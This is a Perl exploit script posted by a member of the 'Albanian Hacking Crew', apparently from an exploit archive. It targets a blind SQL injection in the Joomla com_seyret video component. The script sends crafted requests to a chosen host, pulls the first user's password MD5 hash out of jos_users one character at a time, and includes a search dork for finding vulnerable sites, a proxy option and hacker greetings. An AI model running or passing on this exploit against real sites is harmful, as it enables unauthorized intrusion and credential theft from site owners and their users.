1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 |
1########################################### 1 0I'm **RoAd_KiLlEr**member from Inj3ct0r Team 1 1########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title:Joomla Component (com_seyret) Blind SQL Injection Exploit [+]Author:**RoAd_KiLlEr** [+]Contact:RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on :Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://a-h-crew.net [~] Vendor:http://joomlaholic.com/ [~] Download App:http://joomlaholic.com/downloads/2-seyret-video-component ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]EXPLOIT: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { system("Title Albanian Hacking Crew"); print " \n"; print " #######################################################################\n"; print "# Joomla Component (com_seyret) Blind SQL Injection Exploit \n"; print "# -----------------------------------------------------------\n"; print "# Author: **RoAd_KiLlEr** \n"; print "# Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY<code>\n"; print "# Site: www.a-h-crew.net\n"; print "# -----------------------------------------------------------\n"; print "# Dork : inurl:com_seyret\n"; print "# Usage: perl exploit.pl host path <options> \n"; print "# Example: perl exploit.pl www.host.com /path/ -a 3 \n"; print "# -----------------------------------------------------------\n"; print "# Options: \n"; print "# -a validid \n"; print " #######################################################################\n"; exit; } my $host= $ARGV[0]; my $path= $ARGV[1]; my $userid= 1; my $aid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "a=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"a"}) { $aid = $options{"a"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host= shift; my $path= shift; my $uid = shift; my $aid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php? option=com_seyret&task=videodirectlink&id=".$aid." and ascii(SUBSTRING((SELECT password FROMjos_users LIMIT 0,1),".$i.",1))=".$h.""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "Back"; if($content =~ /$regexp/) { return 1; } else { return 0; } } =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY</code> | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: Inj3ct0r.com & r0073r| indoushka from Dz-Ghost Team| MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== |